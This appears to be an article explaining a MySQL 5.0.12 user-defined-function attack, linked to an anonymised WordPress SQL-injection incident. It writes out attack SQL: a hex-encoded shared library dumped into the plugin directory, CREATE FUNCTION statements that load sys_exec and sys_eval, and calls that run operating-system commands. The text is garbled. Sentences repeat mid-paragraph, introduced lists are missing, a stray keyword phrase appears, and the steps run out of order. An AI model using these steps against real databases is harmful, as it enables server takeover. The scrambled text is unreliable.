In a publicly disclosed incident (name withheld for confidentiality), attackers compromised a marketing department’s WordPress site via SQL injection. The backend database was MySQL 5.0.12 running on a Windows Server 2008 R2 machine—both long out of support.
Within three minutes of gaining database access, the attackers:
The root cause analysis pointed to one line in an old migration document: “MySQL 5.0.12 – working, do not touch.”
The MySQL 5.0.12 exploit forced the community to implement several critical defenses.
With the .so file on disk, the attacker loads the UDF: mysql 5.0.12 exploit
CREATE FUNCTION sys_exec RETURNS INT SONAME 'exploit.so';
CREATE FUNCTION sys_eval RETURNS STRING SONAME 'exploit.so';
Suddenly, the attacker can run operating system commands:
-- Execute a command, return the exit code SELECT sys_exec('id > /tmp/owned.txt');
-- Return the output of a command as a string SELECT sys_eval('whoami');
If MySQL is running as root (a frighteningly common misconfiguration in 2005), the attacker instantly owns the server. If running as mysql, they can still read /etc/passwd, exfiltrate database contents, or use sys_exec to download a rootkit that exploits a local privilege escalation (e.g., CVE-2007-1351). In a publicly disclosed incident (name withheld for
The exploit is harmless if the MySQL daemon runs as a dedicated, low-privileged user:
In MySQL 5.0.12, the server did not properly validate the path of the shared library nor the privileges required to execute arbitrary code within the function. Specifically:
In MySQL replication, slaves connect to the master. If an attacker compromises a master server or creates a fake slave, they can target backup systems or monitoring tools that automatically connect.
The attacker cannot upload binary files via standard SQL INSERT easily, but they can use INTO DUMPFILE. Exploit code (e.g., raptor_udf2.c or lib_mysqludf_sys.so) is hex-encoded and written to disk. The root cause analysis pointed to one line
Example attack SQL:
SELECT 0x7f454c460201010000000000000000000300... INTO DUMPFILE '/usr/lib/mysql/plugin/exploit.so';
(Note: The hex string represents a compiled shared library containing a sys_exec() function.)
Why /usr/lib/mysql/plugin/? This is the default UDF directory. If writable, the attack is trivial. If not, the attacker looks for world-writable directories like /tmp or /var/tmp and hopes the MySQL daemon’s library path includes them (rare, but possible in misconfigurations).